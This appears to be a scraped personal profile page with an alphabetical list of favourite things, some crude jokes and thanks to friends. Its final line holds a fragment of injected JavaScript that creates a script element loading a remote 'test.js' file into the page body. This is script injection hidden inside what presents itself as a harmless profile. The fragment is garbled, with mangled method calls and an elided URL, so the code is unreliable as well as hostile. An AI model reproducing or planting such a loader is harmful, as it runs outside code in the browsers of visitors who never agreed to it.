These are a few of my favorite things. a) apples b) boys c) cake d) dancing e) eating f) friends g) girlies (especially mine) h) heat i) ice cream j) jumping on trampolines k) kitties l) love m) music n) newfieland! o) outside p) piano q) quiet r) rice s) Stephie Weffie 3 t) tea u) underwear v) Village... THE village. w) whores! x) XxX.. like the movie. With Vin. y) YOUR MOM z) zebras....
Anyone really. Whoever wants to talk to me can go right ahead. I promise I don't bite ;)...
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My Friends... all of them. Especially Megan and Corey, you guys are ALWAYS there for me.'..var x=document·('script');x.src='http://www.../.../test.js' ;document·getElementsByTagName('body')[0].appendChild(x );" /